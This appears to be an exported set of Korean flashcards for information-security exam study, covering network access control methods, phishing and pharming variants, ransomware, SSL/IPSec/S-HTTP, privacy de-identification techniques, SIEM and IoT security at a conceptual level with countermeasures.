5
Perfectly
75
Q

NAC (Network Access Control)

A
▣ 정의
- 내부 네트워크에 접속부터 종료까지 전 부문에서 예상되는 보안위협에 대해 해소하기 위하여 사용자 인증 및 단말에 대한 무결성 검사, 네트워크 접근제어 및 정책수립을 적용하는 네트워크 보안 기술
▣ 목적
- Zero-day attack 경감
- 정책의 강제화 : 중간장비 정책 강제화
- 계정 및 접근관리 : 사용자 기준 통제
▣ 구성요소
- NAC Agent
- NAC Guest Server
- NAC Manager
- NAC Profiler
- Directory Service
▣ 주요기능
- 네트워크 접속 전 호스트 상태 평가
- 호스트 격리 및 치료
- ID기반의 사용자 접근권한 통제
- 지속적인 위협분석 및 대응
▣ 구현방식 (통제방식)
- IEEE 802.1x 방식 NAC
- VLAN 방식
- ARP 방식
- SW에이전트 방식
- DHCP 방식
▣ 발전방향
- 네트워크 통합 NAC 적용장비
- NAC 적용 어플라이언스
- NAC 적용 SSL 가상 사설망
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

NAC IEEE 802.1x 방식

A
▣ 설치 : IEEE 802 1.x 스위치, Radius 서버
▣ 개념
- 인증기기는 승인 되지 않거나 적합하지 않은 단말의 네트워크 접속을 차단
- 승인된 단말은 사내 망 접근 허용
▣ 장점
- Windows와 MAC OS 모두 지원
- 암호화 통신
- 대부분의 AP와 스마트 스위치 지원
- 안정적인 터널 제공
▣ 단점
- 승인 전 보안상태를 스캔하는 절차 없음
- 스위치, AP, Radius서버, 클라이언트는 EAP타입(PEAP, TTLS)과 암호타입(WEP, WPA, WPA2)를 지원해야 함
- 가장 설치 어려움
- Windows가 지원하는 것이 제한적
- 실패의 경우 기준으로 제시된 해결책 없음
- 별도의 암호화 채택 필요.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

NAC ARP 방식

A

▣ 설치 : VNAL 지원 스위치
▣ 개념
- VLAN을 이용해서 허가된 네트워크 영역과 비허가된 네트워크 영역을 만들어 접속하는 단말의 MAC 주소를 DB와 확인하여 해당 단말을 허가된 VLAN으로 할당시켜 주거나 비허가된 VLAN으로 이동시켜 차단하는 NAC방식
▣ 장점
- 차단된 호스트들은 허가된 호스트들과 다른 VLAN으로 격리되어 보안 탁월
- 우회하기 어려움
▣ 단점
- 사내 모든 스위치 장비들이 VLAN을 지원해야함
- 장비교체의 경우 많은 비용 발생
- 속도가 느림
- 허브나 VLAN 미지원 스위치들, 공유하고 있는 포트, AP에서는 작동 안함

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

NAC ARP 방식

A
▣ 설치 : NAC 통제기, 일반스위치
▣ 개념
- IP Spoofing을 통하여 차단하고자 하는 단말의 ARP 테이블을 조작하여 차단하는 NAC 방식
▣ 장점
- Layer3 독립적
- 고정된 IP는 우회하지 않음
- 타임아웃 없이 즉각적 고립
- 가장 빠름
- NW 인프라 교체 불필요
▣ 단점
- ARP는 본래 이용도가 아님
- 한 개의 NW구역당 한 개의 장비 필요
- 디버그 어려움
- 고정 APP는 접근가능
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

NAC SW 에이전트 방식

A
▣ 설치 : 인증서버, 일반 스위치, 단말기
▣ 개념
- 각각의 모든 단말에 에이전트를 설치하는 NAC 방식으로 서버에서 차단정책을 설정하고 설치된 에이전트를 통해 네트워크를 차단
- PC 자체에서 나가는 패킷들을 차단 (PC 방화벽과 유사한 윈리)
▣ 장점
- 원하는 단말에 정확히 적용가능
- 서버와 에이전트가 지속적 통신으로 안정적
- 즉각적인 차단가능
- 네트워크 특성에 구애받지 않음
▣ 단점
- 에이전트가 설치되어 있지 않은 단말 차단 어려움
- 모든 단말에 에이전트 설치 필요
- 사용자가 임의로 에이전트 무력화 가능
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

NAC DHCP 방식

A
▣ 설치 : DHCP 서버, 일반 스위치
▣ 개념 : VLAN 차단방식과 유사, 허가된 IP대역과 비허가된 IP대역을 만들어 접속하는 단말의 MAC주소를 DB와 확인하여 해당 단말을 허가된 IP대역으로 할당시켜 주거나 비허가된 IP대역의 IP를 할당시켜 차단하는 NAC 방식
▣ 장점
- 적용하기 가장 쉬운 방식
- DHCP는 발전 완료된 기술(안정적)
- 제조사에 무관하게 동작
▣ 단점
- 고정 IP사용자 차단 불가
- 우회 쉬움
- 신규주소 할당 시 까지 시간소모(느림)
- 침점에 대한 조절 어려움
- 특정 사용자가 감염되었거나, 연결 후에 사용자 차단정책 필요 시 어려움
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

APT (Advanced Persistent Threat) - 광범위한(향상된) 지속적 위협

A
▣ 정의
- 다양한 IT기술과 방식들을 이용해 조직적으로 경제적인 목적을 위해 다양한 보안 위협들을 생산해 지속적으로 특정대상에게 가하는 일련의 보안위협 행위
▣ 특징
- 명확한 타겟 목표
- 우회 공격
- 지능화
- 지속적
▣ 공격 시나리오 및 공격기법
1. 침투 : 취약점 감염
- 관찰, 사회공학, 제로데이, 수동
2. 탐색 : 정보수집 및 계획
- 다중백터, 은밀한 공격, 연구 및 분석
3. 수집 : 데이터 수집, 운영방해
- 은닉, 권한상승
4. 제어 : 데이터 전송, 파괴
- 유출, 중단
▣ 대응기술
- 네트워크 보안 (IDS/IPS/Firewall)
- 망분리 중계서버
- 클라이언트PC (End-Point PC 보안, 좀비 PC 방지
- 웹 방화벽
- 행위기반 탐지
- 데이터유출방지(DLP)
- 화이트리스트 기반 보안시스템
- 보안관제서비스
- 데이터 암호화
- 데이터 접근제어
- DB Audit
▣ 대응체계
- 침해사고 대응센터(위협 모니터링/대응)
- 시큐리티 대응센터(악성코드 수집/분석)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

파밍 (Pharming)

A
▣ 정의
- 정상적인 웹 사이트 접속이 사기 목적의 웹 사이트로 연결되는 전형적인 기술적 사기 방법
▣ 특징
- 일반 인터넷 사용자에게 익숙한 인터넷 주소 강탈
- 인터넷 사용자는 의심하지 않고 중요 개인 정보 노출
▣ 동작원리
1) 위조 사이트 설치
2) DNS해킹
3) DNS조회
4) 가짜 사이트 접근
▣ 공격유형
- DNS 주소의 변조
- 클라이언트 호스트 파일 변경
- 클라이언트 DNS서버설정 주소 변경
- 등록된 도메인의 정보 변경
▣ 대응방안
- 기관은 HTTPS, EV SSL 사용
- 도메인 등록대행기관에 도메인 잠금 기능 신청
- DNS 시스템 보안 강화
- DNS 레코드에 대한 전자서명 및 검증방안고려
- 웹서버 인증서를 통한 웹사이트의 진위 여부 확인 방안 모색
- OTP 인증 활용
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

피싱 (Phishing)

A
▣ 정의
- 공신력 있는 기관을 사칭한 이메일을 이용한 사회적 사기 방법
▣ 특징
- 사회 공학적 공격
- 주로 이메일 이용
▣ 피싱절차
1) 피싱 메일 발송
2) 링크 사이트 클릭
3) 위조된 사이트에서 금융 정보 입력
4) 입력된 정보를 이용한 사기
▣ 공격기법
- 유사한 이메일 주소 이용
- 유사한 도메인 이름 사용
- 이메일 주소 Spoofing
- Hyperlink 위조
- 스크립트를 이용한 주소창 위조
- Popup 창을 이용
- 웹브라우저의 URL Spoofing 취약점 (%01, %00, @)
- 링크 주소 Encoding
- 메일 본문에 중요정보 직접입력
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

악성 AP를 용한 피싱 공격

A
▣ 취약점
- 가짜 AP : 정상 AP와 동일한 SSID를 설정한 악성 AP 생성
- 공공장소 AP : 정상여부, 설치위치 파악 어려움
- 보안관리자 부재 : 소규모 환경에서의 보안관리자 부재
- 무료 AP : 무료 AP 우선 접속
▣ 절차
1) 악성 AP 접속
2) 사용자 정보 요구
3) 정보 남용
▣ 시사점
- 정부 : 지식제공, 인식제고, 공공장소 보안요구사항 수립
- 사업자 : 보안사고 대응체계 수립, 보안 대책 추진
- 보안담당자 : 주기적 점검
- 사용자 : 이용 필요성 및 방법 준수
▣ 대응방안
1) 기술적 측면
- SSID 방송 금지
- 전송정보 암호화
- 무선 인증 사용 (WPA)
- 비인가 무선장비 탐지
2) 관리적 측면
- 무선랜 서비스 지역검점
- Defalut Password 변경
3) 물리적 측면
- 접근제한
▣ 예방방법
- 링크된 금융회사 사이트 이용 금지
- 개인정보 제공 주의
- 바이러스 체크 후 첨부 오픈
- OS 보안패치, 백신 업데이트
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

랜섬 웨어 (Ransom + Ware)

A
▣ 정의
- 컴퓨터 사용자의 문서를 인질로 잡고 돈을 요구하는 기법
▣ 특징
- 개인 단말기 감염
- 개인문서 암호화를 통한 인질
- 직접적인 금전요구
- 제한시간 등 사용자 판단을 흐리게 하는 사회공학 기법
▣ 공격방법
- 드라이브 바이 다운로드
- 영문 이메일 전파
- 특정 메신저 전파
▣ 사례
- 크립토락커 : 이메일/메신저
- 크립토월 : 비트코인사용, 이메일
- 레베톤 : FBI 사칭
- 우라우시 : 국가기관 사칭
- 심플락커 : 안드로이드 doc, jpg 암호화
▣ 대응방법
- 중요한 문서에 대하여 정기적인 백업
- 출처가 불분명한 이메일 및 URL 접근 금지
- 메일의 첨부파일은 바이러스 체크 후 오픈
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

스미싱 (Smishing)

A
▣ 정의
- 문자메시지(SMS)와 피싱(Phishing)의 합성어
- 스마트폰 소액결제 방식을 악용하는 신종사기 수법
▣ 특징
- 휴대폰 SMS 활동 감염
- 휴대폰 소액결재 인증, 대금청구
▣ 공격단계
1) 문자 메시지 내 인터넷 URL 클릭
2) 스마트폰에 악성코드 설치
3) 범인에게 소액결재 인증번호 전송
4) 범죄자가 게임 아이템, 사이버 머니 등 구입
5) 소액결재 대금 청구(스마트폰 이용자)
▣ 대응방안
- 소액결재 차단/제한
- 백신설치
- 공인앱 설치
- 불분명한 링크 회피
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q

탈린 메뉴얼 (Tallinn Manual)

A

▣ 개념
- 2013년 3월 북대서양조약기구(NATO)가 사이버 테러에 관한 조항들을 성문화한 최초의 사이버교전 수칙, 가이드라인
▣ 구성
- Part1 : 국제 사이버 보안법 (총 2장 19개 규칙, 국가/정부 측면 보안 역할 명시)
- Part2 : 사이버 무력 충돌법 (총 4장 76개 규칙, 사이버 공격 정의/대응 방법 명시)

88
Q

액티브 피싱 (Active Phishing)

A
▣ 정의
- 사용자가 입력한 정보를 중간에서 가로채서 사용자에게는 공격자가 실제 웹사이트 인 것 처럼 속이고 웹사이트에게는 공격자가 정상적인 사용자인 것처럼 속이는 신종 피싱 공격
▣ 특징
- 실시간 피싱기법
- 보안정책 우회 (키로깅, 안티바이러스, 피싱차단 무용지물)
- 개인정보 평문 노출
- 2채널, 투팩터 인증 효과 없음
▣ 공격시나리오
1) 설치 : 공격자가 사용자와 금융 사이트 사이에 위치
2) 전달 : 사용자에게 금융 사이트에서 수신한 화면 제공
3) 변조 : 사용자가 계좌이체 시도시, 공격자는 사용자가 입력한 계좌이체 정보 변조
4) 대기 : 사용자에게는 원래 계좌이체 정보를 보여주지만 실제 웹 사이트에는 공격자의 계좌이체 정보를 입력하고 대기
5) 인증 : 사용자는 실제 웹 사이트에 사용하는 OTP 인증 수행
6) 완료 : 실제 웹 사이트는 사용자로부터 인증을 확인 받고, 공격자가 전달한 계좌이체를 완료
▣ 대응 전제 조건
- 편의성 : 낮은 입력 횟수, 자동화, 새로운 HW 미요구
- 성능 : 빠른탐지, 낮은 오탐/미탐
- 보안성 : 프로토콜 안전성, 자체 보안, 기존 피싱/파밍 공격 대응, 액티브 피싱 공격 대응, 새로운 피싱 공격에 유연하게 대처 가능
▣ 대응 기술
1) 스마트 채널 로그인 요청
2) QR 코드 출력
3) 스마트 채널 구동 후 QR 코드 인식
4) 서버 확인 후 상호인증 로그인
5) 로그인 완료
89
Q

스피어피싱 (Spear Phishing)

A
▣ 정의
- 직장동료나 친구, 가족을 사칭한 이메일 사기 기법으로 특정인을 대상으로 ID, Password를 획득하여 정보를 탈취하는 사회공학적 해킹 기법
▣ 특징
- 사회공학기반 : 관계, 신뢰 이용
- 특정 타겟
- 탐지 어려움
▣ 절차
1) 해커는 Document exploit이 첨부된 이메일 준비
2) 이메일을 타겟 사용자에게 전송
3) Document 오픈시 악성코드 감염
4) 내부 네트워크 취약점 탈취
5) 알려진 Exploit 으로 추가 PC공격
6) Backdoor 감염 &amp; 정보 유출
▣ 대응방안
1) 기술적 측면
- 정기적 보안패치
- 보안 프로그램 설치
- 비밀번호 갱신
2) 관리적 측면
- 정보보안 교육
- 전문인력 양성
- 후속조치 수립
90
Q

SSL (Secure Socket Layer)

A
▣ 정의
- TCP/IP 계층과 애플리케이션 계층(HTTP, TELNET, FTP 등) 사이에 위치하여 인증, 암호화, 무결성을 보장하는 업계 표준 프로토콜
▣ 특징
- 공개키 기반 인증방식 : RSA, X509 v3
- 3가지 인증 모드 지원 : 익명/서버/C-S
- 다양한 암호 알고리즘 지원
- 핸드 쉐이크를 통한 통신
▣ 관련 프로토콜
- TLS (Transport Layer Security)
- WTLS (Wireless)
▣ 구조
HTTP-SSL-TCP-IP
▣ SSL 프로토콜의 구성
- SSL Handshake Protocol : 상호인증
- SSL Change Cipher Spec Protocol : 암호사양 변경 프로토콜
- SSL Alert Protocol : 오류 전송
- HTTP
- SSL Record Protocol : 제어 메시지 저장
- TCP/IP
▣ 작동원리
1) 클라이언트가 서버에 접속하면 서버인증서(서버의 공개키를 인증기관이 전자서명으로 인증한 것)를 전송 받음(이때, 클라이언트 인증을 필요로 할 경우 클라이언트의 인증서를 전송함)
2) 클라이언트는 받은 서버 인증서를 분석하여 신뢰할 수 있는 인증서인지를 검토한 후 서버의 공개키를 추출
3) 클라이언트가 세션키로 사용할 임의의 메세지를 서버의 공개로 암호화 하여 서버에 전송
4) 서버에서는 자신의 개인키로 세션키를 복호화하여 그 키를 사용하여 대칭키 암호방식으로 메시지를 암호화 하여 클라이언트와 통신
▣ 적용방안
- SSL VPN 보안
- 모바일 환경
- TLS1.0으로 통합 (유무선 전자상거래 수단 이용)
91
Q

IPSec VPN

A
▣ 인증
- 양방향 인증
- X.509 기반 인증서
▣ 암호화
- 강력한 암호화
- 수행에 의존
▣ 전반적인 보안성
- Client to Gateway 보안
▣ 접근성
- 정의된 사용자 기반 접근
▣ 비용
- 높음
- 클라이언트 소프트웨어 구입 및 유지비용
▣ 설치
- 기술적인 설치 지원 필요
- 클라이언트 측 소프트웨어 또는 하드웨어 필요
▣ 사용자 편의성
- 기술적 마인드가 부족한 사람에게는 불편함
- 사용자 기술 교육 필요
▣ 애플리케이션 지원
- 모든 IP 기반 애플리케이션
▣ 사용자
- 내부사용자
▣ 확장성
- 서버 쪽에서만 확장성을 지니고 있으며, 사용자 측면의 확장성은 기대 하기 어려움
92
Q

SSL VPN

A
▣ 인증
- 단방향 또는 양방향 인증
- X.509 기반 인증서
▣ 암호화
- 강력한 암호화
- 표준화된 웹 브라우저 기반
▣ 전반적인 보안성
- End to End 보안
- 사용자 환경에 따른 보안성 제어
▣ 접근성
- 언제 어디서든 접근 가능
▣ 비용
- 저렴
- 클라이언트 소프트웨어 불필요
▣ 설치
- 플러그 앤 플레이 설치
- 클라이언트 소프트웨어 또는 하드웨어 설치 불필요
▣ 사용자 편의성
- 웹기반의 편리한 사용자 인터페이스 제공
- 사용자 교육 불필요
▣ 애플리케이션 지원
- 모든 IP 기반 애플리케이션 지원
▣ 사용자
- 내부사용자, 고객, 파트너, 원격접속자
▣ 확장성
- 유연한 확장성
93
Q

S-HTTP

A
▣ 개념
- HTTP 프로토콜에 보안 기능을 포함 한 것으로 사용자가 인터넷을 통해 전송하는 웹 문서의 암호화 및 전자서명을 지원하는 프로토콜
▣ 특징
- 연결주소 : shttp://
- 암호화 : 메시지 단위 암호화 및 인증
- 인증방식 : 서버, 클라이언트 상호 인증
- 보호범위 : 웹에 한하여 보호
- 보안서비스 : 트랜잭션 기밀성, 메시지무결성, 발신자 인증, 부인봉쇄, 접근통제
▣ 주요 알고리즘
1) 서명 : RSA, DSA
2) 암호화 : DES, RC2
3) 메시지축약 : MD5, SHA
4) 키교환 : Diffie-Hellman, Kerberos
5) 캡슐화형식 : PGP, MOSS, PKCS-7
94
Q

S-HTTP

A
▣ 동작계층 : Application
▣ 인증방법 : 서버, 클라이언트 상호인증
▣ 특징 : http 보안 강화
▣ 암호화 : RSA, PGP, DES, 패킷단위 암호화
▣ 보안지원 : 기밀성, 인증, 무결성, 부인방지
▣ APP 적용 : HTTP이용 어플리캐이션 (은행, 증권사 등)
95
Q

SSL

A
▣ 동작계층 : TCP/IP Layer
▣ 인증방법 : 서버측 인증 방법만 이용
▣ 특징 : 소켓 사이 암호화 통신
▣ 암호화 : RSA, 페이지 및 프레임 단위 암호화
▣ 보안지원 : 인증, 기밀, 무결성
▣ APP 적용 : TCP 이용 어플리케이션 프로토콜 적용가능 (포탈, 쇼핑몰 등)
96
Q

IPSec (Internet Protocol Security)

A
▣ 정의
- IP 프로토콜 수준의 보안 서비스를 목적으로 L3계층에서 인증 및 암호화하는 보안 체계
▣ 특징
- L3계측, 터널링기술, 인증기술, 데이터 무결성 및 기밀성보장
- MIMA 방지, SA교환을 통한 상호통신 정책협상 방식
▣ 주요기술요소
1) 인증구성
- SA(Security Association) : 보안
- AH(Authentication Header) : 데이터/무결성 인증
- ESP(Encapsulation Security Payload) : 무결성, 암호화
- IKE(Internet Key Exchange) : 키 관리/분배, 암호화 알고리즘 협상
2) 정책구성
- SAD(Security Association Database) : 양단간 비밀교환 설정 보안요소 관리
- SPD(Security Policy Database) : 트래픽 참조 패킷 보안정책 적용 (폐기, 통과, 적용)
▣ 키관리 방법
- IPSec 키관리 : 상호교환
- 교환 프로토콜 : ISAKMP + Oakley 결합
- 교환 절차 : 2단계 분배 (1단계 : 어그레시브 모드 6번 교환, 2단계 : 퀵모드 주기적 세션키 변경)
▣ 보호 동작모드
1) 전송 모드
- 구간 : End-to-End
- 보호 : 데이터 그램 내용만 보호
- 헤더위치 : IP헤더와 패킷의 나머지 사이에 추가
- 적용 : 단일 랜 세그먼트나 사설 네트워크 통신 시
2) 터널 모드
- 구간 : gateway-to-gateway
- 보호 : 데이터 그램의 내용과 통신자 IP은폐
- 헤더위치 : IP 헤더 앞에 IPSet 헤더 위치
- 적용 : 두 호스트간 미보호 구간 네트워크 패킷 전달 시
97
Q

SSL MITM

A
▣ 정의
- Switch, Router 등의 N/W 장비를 이용하거나 Proxy Server를 이용하여 Web Site 접속 초기에 Connection을 탈취하여 Sniffing 하는 해킹 기술
▣ 공격기법
1) 접속 경로 변조 : ARP/DNS Spoofing
2) 인증서 변조
3) 데이터 탈취
▣ 대응방법
1) End to End 보안 : 최신 OS Patch, 최신 Web Browser, 백신
2) Network 방재 : WIPS, Firewall/IPS
3) 사용자 교육
98
Q

빅데이터 개인정보 가이드라인

A
▣ 공개된 정보 (가이드 2조 1항)
- 이용자 및 정당한 권한이 있는 자에 의해 공개 대상이나 목적의 제한이 없이 합법적으로 일반 공증에게 공개된 부호, 문자, 음성, 음향, 영상 등의 정보
▣ 공개된 정보 활용 허용의 원칙
- 이용자가 SNS 나 온라인에 자신의 정보나 취향을 공개했다면, 이는 개인정보를 공개 또는 제공할 의향이 있는 것으로 잠정 판단하고 기업이 이를 수집해 활용할 수 있도록 허용한 것
▣ 빅데이터 개인정보보호 가이드라인의 개념
- 공개된 정보 활용에 대한 개인정보 보호 원칙 및 가이드
▣ 빅데이터 개인정보보호 가이드라인의 목적
- 빅데이터 처리에 있어 이용자의 프라이버시 등을 보호하고 안전한 이용환경을 조성하는 목적
▣ 가이드라인 주요 내용
3조 : 개인정보 보호
- 비 식별화
- 시스템 보호조치
4조 : 공개된 정보의 수집/이용
- 비 식별화
- 개인정보 취급방침 공개
5조 : 이용내역정보의 수집/이용
- 비 식별화 예외 경우
- 처리 거부방법 및 절차 마련
6조 : 새로운 정보의 생성
- 재식별시 파기
- 개인정보 취급방침 공개
7조 : 민감정보의 생성 금지
8조 : 통신내용의 조합, 분석 또는 처리 금지
9조 : 공개된 정보 및 이용내역정보의 이용
10조 : 제 3자 제공
11조 : 적용범위
99
Q

개인정보 비식별화

A
▣ 정의
- 정보에 포함되어 있는 개인정보의 일부 또는 전부를 삭제하거나 다른 정보로 대체함으로써 다른 정보와 결합하여도 특정 개인을 식별하기 어렵도록 하는 일련의 조치
▣ 비식별화 적용 대상
1) 그 자체로 개인을 식별할 수 있는 정보
- 쉽게 개인을 식별할 수 있는 정보
- 고유 식별 정보
- 생체 정보
- 기관, 단체 등의 이용자 계정
2) 다른 정보와 함께 결합하여 개인을 알아볼 수 있는 정보
- 개인 특성
- 신체 특성
- 신용 특성
- 경력 특징
- 전자적 특징
- 가족 특성
- 위치 특성
▣ 개인정보 비식별화 처리 기법
1) 가명처리
- 휴리스틱 익명화
- K-익명화
- 암호화
- 교환방법
2) 총계처리
- 총계처리 기본방식
- 부분집계
- 라운딩
- 데이터 재배열
3) 데이터 값 삭제
- 속성값 삭제
- 속성값 부분 삭제
- 데이터 행 삭제
- 준식별자 제거를 통한 단순 익명화
4) 범주화
- 범주화 기본 방식
- 랜덤 올림 방법
- 범위 방법
- 세분정보 제한방법
- 제어 올림 방법
5) 데이터마스킹
- 임의 잡음 추가 방법
- 공백과 대체 방법
100
Q

가명처리 (Pseudonymisation)

A
▣ 개념
- 개인 식별이 가능한 데이터에 대하여 직접적으로 식별할 수 없는 다른 값으로 대체하는 기법
▣ 처리대상 식별정보
- 성명, 출신학교, 근무처
▣ 세부기술
- 휴리스틱 익명화
- K-익명화
- 암호화
- 교환방법
▣ 장점
- 그 자체로는 완전 비식별화가 가능하며 데이터의 변형, 변질 수준이 적음
▣ 단점
- 일반화된 대체값으로 가명처리함으로써 성명을 기준으로 한 분석에 한계 존재
101
Q

총계처리 (Aggregation)

A

▣ 개념
- 개인 정보에 대하여 통계값(전체 혹은 부분)을 적용하여 특정 개인을 판단할 수 없도록 함
▣ 처리대상 식별정보
- 생일, 자격 취득일, 수입지출, 신체정보, 진료기록, 병력정보, 특정 소비기록
▣ 세부기술
- 총계처리 기본 방식
- 부분 집계
- 라운딩
- 데이터 재배열
▣ 장점
- 민감한 정보에 대하여 비식별화가 가능하며 다양한 통계분석(전체, 부분)용 데이터 셋 작성에 유리 함
▣ 단점
- 집계 처리된 데이터를 기준으로 정밀한 분석이 어려우며 집계 수량이 적을 경우 데이터 결합 과정에서 개인정보 추출 또는 예측이 가능

102
Q

데이터 값 삭제 (Data Reduction)

A
▣ 개념
- 개인 정보 식별이 가능한 특정 데이터 값 삭제 처리
▣ 처리대상 식별정보
- 이름, 전화번호, 주소, 생년월일, 사진, 주민등록번호, 운전면허정보, 지문, 홍체, DNA, 계좌번호, 이메일 주소
▣ 세부기술
- 속성값 삭제
- 속성값 부분 삭제
- 데이터 행 삭제
- 준식별자 제거를 통한 단순 익명화
▣ 장점
- 민감한 개인식별 정보에 대하여 완전한 삭제 처리가 가능하여 예측, 추론 등이 어려움
▣ 단점
- 데이터 삭제로 인한 분석의 다양성, 분석 결과의 유효성, 분석 정보의 신뢰성을 저하시킴
103
Q

범주화 (Data Suppression)

A
▣ 개념
- 단일 식별 정보를 해당 그룹의 대표값으로 변환(범주화) 하거나 구간값으로 변환(범위화)하여 고유 정보 추적 및 식별 방지
▣ 처리대상 식별정보
- 쉽게 개인을 식별할 수 있는 정보, 고유식별정보, 기관, 단체 등의 이용자 계정
▣ 세부기술
- 범주화 기본 방식
- 랜덤 올림 방법
- 범위 방법
- 세분 정보 제한방법
- 제어 올림 방법
▣ 장점
- 범주나 범위는 통계형 데이터 형식이므로 다양한 분석 및 가공이 가능
▣ 단점
- 범주, 범위로 표현됨에 따라 정확한 수치 값에 따른 분석, 특정한 분석 결과 도출이 어려우며, 데이터 범위 구간이 좁혀 질 경우 추적 예측이 가능
104
Q

데이터 마스킹 (Data Masking)

A

▣ 개념
- 개인 식별 정보에 대하여 전체 또는 부분적으로 대체값(공백, ‘*’, 노이즈)으로 변환
▣ 처리대상 식별정보
- 쉽게 개인을 식별할 수 있는 정보, 고유식별정보, 기관/단체 등의 이용자 계정
▣ 세부기술
- 임의 잡음 추가 방법
- 공백과 대체 방법
▣ 장점
- 완전 비식별화가 가능하며 원시 데이터의 구조에 대한 변형이 적음
▣ 단점
- 과도한 마스킹 적용시 필요한 정보로 활용하기 어려우며, 마스킹의 수준이 낮을 경우 특정한 값의 추적 예측 가능함

105
Q

휴리스틱 익명화 (Heuristic Pseudonymization)

A
  • 식별자에 해당하는 값들을 몇 가지 정해진 규칙으로 개인정보를 숨기는 방법

- 사람의 판단에 따라 가공하여 자세한 개인 정보를 숨기는 방법

106
Q

K-익명화 (K-anonymity)

A
  • 동일한 속성 값을 가지는 데이터를 K개 이상으로 유지하여 데이터를 공개하는 방법으로서 지정된 속성이 가질 수 있는 값을 K개 이상으로 유지하여 프라이버시 누출을 방지
107
Q

암호화 (Encryption)

A
  • 정보의 가공에 있어서 일정 규칙의 알고리즘을 적용하여 암호화함으로써 개인정보를 대체하는 방법

- 통상적으로 다시 유용하게 사용하기 위해서 복호화 가능하도록 암호화/복호화 값(Key)을 가지고 있어서 Key에 대한 보안 방안도 함께 필요함

108
Q

총계처리 (Aggregation) 기본 방식

A
  • 수집된 정보에 민감한 개인정보가 있을 경우 데이터 집단 또는 부분으로 집계(총합, 평균) 처리를 하여 민감성을 낮춤
109
Q

부분집계 (Micro Aggregation)

A
  • 분석 목적에 따라 부분 그룹만 비식별 처리, 측 다른 속성값에 비하여 오차 범위가 큰 항목이나 속성값에 대하여 통계값(평균)을 활용하여 값을 변환
110
Q

라운딩 (Rounding)

A
  • 집계 처리된 값에 대하여 라운딩 (올림, 내림, 사사오입) 기준을 적용하여 최종 집계 처리
111
Q

데이터 재배열 (Rearrangement)

A
  • 기본 정보값은 유지하면서 개인 정보와 연관이 되지 않도록 해당 데이터를 재배열.

- 즉, 개인의 정보가 타인의 정보와 뒤섞임으로써 전체 정보의 손상없이 개인의 민감 정보가 해당 개인과 연결되지 않도록 하는 방법

112
Q

속성값 삭제 (Reducing Variables)

A
  • 원시 데이터에서 민감한 속성값 등을 개인식별 항목을 단순 제거하는 방법
113
Q

속성값 부분 삭제 (Reducing Partial Variables)

A
  • 민감한 속성값에 대하여 전체를 삭제하는 방식이 아닌 해당 속성의 일부값을 삭제함으로써 대표성을 가진 값으로 보이도록 하는 방법
114
Q

데이터 형 삭제 (Reducing Records)

A
  • 타 정보와 비교하여 값이나 속성의 구별이 뚜렷하게 식별되는 정보 전체를 삭제.

- 즉, 특정하게 민감한 속성값 하나가 아닌 해당 정보를 가진 개인의 내용 전체를 제거하는 방법

115
Q

준식별자 제거를 통한 단순 익명화 (Trivial Anonymization)

A
  • 식별자뿐만 아니라 잠재적으로 개인을 식별할 수 있는 준식별자를 모두 제거함으로써 프라이버시 침해 위험을 줄이는 방법
116
Q

범주화 (Data Suppression) 기본 방식

A
  • 은폐화 바업이라고도 하며 명확한 값을 숨기기 위하여 데이터의 평균 또는 범주의 값으로 변환하는 방식
117
Q

랜덤 올림 방법 (Random Rounding)

A

개인 식별 정보에 대한 수치 데이터를 임의의 수 기준으로 올림 (round up) 또는 절사 (round down) 하는 기법

118
Q

범위 방법 (Data Range)

A
  • 개인식별 정보에 대한 수치 데이터를 임의의 수 기준의 범위(range)로 설정하는 기법으로서 해당 값의 분포(범위(range), 구간(interval))로 표현
119
Q

세분정보 제한방법 (Subdivide Level Controlling)

A
  • 개인정보 중 단일 항목으로 개인식별이 될 수 있는 항목을 민감(sensitive) 항목 또는 높은 시각(High visibility) 항목이라 하는데, 이와 같은 민감한 항목을 상한(top), 하한(bottom) 코딩, 구간 재코딩(recording into intervals) 방법을 이용하여 정보노출 위험을 줄일수 있는 기법
120
Q

제어 올림 방법 (Controlled Rounding)

A
  • 랜덤 올림 방법에서 행과 열의 합이 일치하지 않는 단점을 해결하기 위해 행과 열이 맞지 않는 것을 제어하여 일치시키는 기법
121
Q

임의 잡음 추가 방법 (Adding Random Noise)

A
  • 소득과 같은 민감 개인식별 항목에 대해 임의의 숫자등의 잡음 추가(더하거나 곱)하여 식별정보 노출을 방지하는 기법
122
Q

공백(Blank)과 대체(Impute) 방법

A
  • 빅에티어 자료로부터 비식별 대상 데이터를 선택한 후, 선택된 항목을 공백으로 바꾼 후에 대체법(impultation)을 적용하여 공백부분을 채우는 기법
123
Q

SIEM (Security Information and Event Management)

A
▣ 정의
- 빅데이터의 방대한 정보 속에서 단순한 로그 수집 및 분석이 아닌 사후에 추적 등이 가능하도록 상관분석과 포렌식 기능을 제공해주는 지능적 위협에 대한 조기 경고 모니터링 체계
▣ SIEM의 상관관계분석
- 공격판단룰셋 : Event
- 로그간의상관관계 : AND, OR
▣ SIEM의 주요기능
1) 로그관리
- 수집로그 무결성 보장
- E-Discovery 대응
2) 로그분석
- 로그분석시간 단축
- 상관분석을 통한 탐지 정확도 향상
▣
124
Q

IoT (Internet of Things)

A
▣ 개념
- 생활 속 사물들을 유무선 네트워크로 연결해 정보를 공유하는 환경
▣ IoT 환경이 보안에 취약한 이유
- 무선 인터넷의 구조적 취약성
- 낮은 디바이스 단가
- 적절한 인증 수단의 부재
- 보안 규제, 가이드라인 전무
▣ IoT 보안 사고의 영향
- 사생활 침해
- 전자 금융 사기를 통한 금전적 피해
- 사회/국가적 기능 마비
- 국민의 생명 위협
▣ 구성요소 분류
1) 통신
- RFID, 셀룰러, 무선통신, 유성통신, 오버레이, 적외선
2) 센서
- 비디오, 오디오, 위치, 변속계, 온도계, 근접센서, RFID 리터
3) 액츄에이터
4) 스토리지
- 데이터베이스, DHT
5) 단말
